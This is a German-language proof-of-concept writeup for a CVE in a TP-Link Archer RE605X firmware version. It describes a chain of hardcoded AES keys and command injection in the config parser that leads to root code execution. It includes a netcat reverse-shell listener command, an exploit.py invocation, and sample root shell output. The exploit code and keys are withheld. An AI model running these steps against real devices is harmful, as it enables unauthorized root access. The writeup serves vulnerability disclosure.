
Proof of Concept für CVE-2025-15545
Hersteller: TP-Link
Website des Herstellers: TP-Link
Modell: Archer RE605X
Hardware-Version: RE605X v3.0
Firmware-Version: RE605X(EU)_V3_1.1.5 Build 20240905
Firmware-Downloadadresse: TP-Link
Eine Kette von Schwachstellen — einschließlich der Verwendung hartkodierter kryptografischer Schlüssel und einer Befehlsinjektion in der Komponente des XML-Konfigurationsparsers — ermöglicht es einem lokal authentifizierten Angreifer, entfernte Codeausführung (RCE) als Root auf dem Gerät zu erreichen.
Hinweis: Das Proof-of-Concept exploit.py demonstriert ein verkettetes Angriffsszenario und stützt sich als zusätzliche Voraussetzung auf die Anmeldeinformationen eines authentifizierten Benutzers. Dieser Authentifizierungsschritt wird nicht von CVE-2025-15545 abgedeckt und dient nur Demonstrationszwecken.
Lauschen Sie auf eingehende Verbindungen in einem separaten Terminal:
$ nc -lvnp 4444
Führen Sie das Skript exploit.py aus:
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>
Hinweis: aes_key und aes_iv sind die hartkodierten kryptografischen Schlüssel, die vom Gerät zur Ver- und Entschlüsselung von Konfigurationsdateien verwendet werden, und sie werden für dieses Proof-of-Concept benötigt. Aus Sicherheitsgründen können sie hier nicht geteilt werden.
Die Reverse-Shell wird auf dem ersten Terminal empfangen:
$ nc -lvnp 4444
Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt
Diese Schwachstellen wurden von Nicola Giuffrida gemeldet.